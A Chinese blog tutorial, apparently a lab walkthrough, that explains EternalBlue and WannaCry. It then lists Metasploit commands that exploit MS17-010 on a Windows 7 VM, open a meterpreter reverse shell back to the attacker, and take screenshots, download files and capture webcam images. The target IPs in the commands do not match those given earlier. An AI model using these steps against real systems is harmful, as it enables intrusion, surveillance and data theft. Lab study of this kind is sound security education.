永恒之蓝复现

什么是永恒之蓝

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

SMB协议

SMB(全称是Server MessageBlock)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

原理

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

本漏洞需要用到kali自带的Metasploit渗透工具,关于该工具的使用,之后再细讲。

Metasploit框架(简称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。
该工具有六个模块,分别为辅助模块(auxiliary)、渗透攻击模 (exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。

下面开始复现。
需要windows7(关闭防火墙),kalilinux
先要确定ip地址
windows:ipconfig 192.168.195.129
永恒之蓝复现_第1张图片

kali:ifconfig 192.168.195.128
永恒之蓝复现_第2张图片
开启Metasploit框架

msfconsole //启动命令

永恒之蓝复现_第3张图片
使用永恒之蓝漏洞:

use exploit/windows/smb/ms17_010_eternalblue

永恒之蓝复现_第4张图片
显示所需要的参数

show options
永恒之蓝复现_第5张图片

我们需要设置一个远程主机ip和一个自己电脑ip,外加一个攻击载体,就可以进行攻击了(依次执行下边命令)。

set rhost 192.168.1.104 //设置目标主机
set payload windows/x64/meterpreter/reverse_tcp //设置攻击载体(简单来说就是,如果不使用这个模块,攻击成功之后,就是一个简单的shell,使用这个载体,攻击成功之后可以使用这个模块自带的各种攻击模块(强大到想流泪的功能模块)
set lhost 192.168.1.109 //设置本机ip地址(用来攻击成功之后,监听被开放的目标电脑的端口)
run //执行攻击

永恒之蓝复现_第6张图片
利用成功,成功之后会出现下面的情况,在这里可以进行文件上传下载,获取截屏,获取密码,使用摄像头拍照,后门持久化等操作
永恒之蓝复现_第7张图片

screenshot //获取截屏
永恒之蓝复现_第8张图片

download AHK.ahk //下载文件
webcam_snap //使用摄像头拍一张照片
webcam_stream //在网页开启摄像头

你可能感兴趣的:(网络,安全,web安全)